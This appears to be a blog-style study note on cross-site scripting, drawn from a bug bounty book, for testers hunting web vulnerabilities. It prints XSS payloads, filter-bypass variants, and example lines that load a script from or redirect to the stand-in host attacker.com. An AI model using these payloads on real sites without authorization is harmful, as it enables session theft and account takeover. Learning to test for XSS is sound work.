Cross-Site Scripting (XSS)

This is just a short note of the topic XSS from the book Bug Bounty Bootcamp The Guide to Finding and Reporting Web Vulnerabilities by Vickie Li

Cross-Site Scripting (XSS) is one of the most common and impactful web vulnerabilities. Despite modern defenses, it still appears frequently in bug bounty programs and real-world applications.

This report explains the mechanism, types, hunting methodology, bypasses, and attack escalation in a structured, beginner-friendly way.

What is XSS?

Websites are built on HTML, CSS, and JavaScript.

• If you inject only HTML tags (like <h1>, <u>, <i>), it’s called HTML Injection.
• But if you manage to inject and execute JavaScript code in a victim’s browser, it becomes an XSS vulnerability.

👉 Example payloads:

<script>alert("XSS")</script>
<script src="http://attacker.com/xss.js"></script>
<script>location="http://attacker.com"</script>

Here:

• <script> is the HTML container.
• alert() , location= are the JavaScript payloads.

TYPES OF XSS

XSS TYPES

⚠️ Note: Self-XSS is not accepted in bug bounty programs.

XSS Hunting Methodology

Central Principle: Check for Reflected User Input

Step 1: Find Input Opportunities

• Look at search bars, comments, forms, reviews, etc.
• Don’t ignore drop-downs, numeric fields (e.g., age). Use Burp Suite to modify requests.

POST /edit_user_age
age=<script>alert('XSS')</script>

👉 Tip: Always view source code to confirm where your input appears.

Step 2: Insert Payloads

• Simple payloads like <script>alert(1)</script> rarely work on modern apps.
• Try event handlers instead:

<img src=x onerror=alert('XSS')>
<img onload=alert("Loaded!") src="image.png">
<a href="javascript:alert('XSS')">Click me!</a>

• Use data schemes:

data:text/html,<script>alert('XSS')</script>

• Use polyglot payloads to test multiple contexts at once:

"><svg onload=alert(1)>

👉 If payloads fail, Inspect → Console to debug syntax errors.

Step 3: Confirm the Impact

• Did the payload run?
• Who does it affect? (User vs. Admin?)
• Does it persist or require a crafted URL?

Impact validation is critical for bug bounty severity.

Bypassing XSS Protections

Websites often filter input. Here’s how to bypass common protections:

1.Alternative Syntax

<img src=x onerror="alert(1)">
<a href="javascript:alert(1)">Click me!</a>

2.Capitalization & Encoding

<scrIPT>alert(1)</scrIPT>
<script>String.fromCharCode(97,108,101,114,116)(1)</script>

3.Filter Logic Errors

<scrip<script>t>alert(1)</scrip</script>t>

My Improved XSS Testing Workflow

1. Enumerate all possible input vectors.
2. Test with KXSS or Polyglot payloads to check protections.
3. Debug payloads with console errors.
4. Modify payloads intelligently based on filters.

Key Takeaways

• XSS is still one of the most frequent vulnerabilities.
• Always think in terms of contexts (HTML, attributes, JavaScript, URL).
• Debugging and bypassing filters is often the real challenge.
• A properly executed XSS can lead to full account takeover.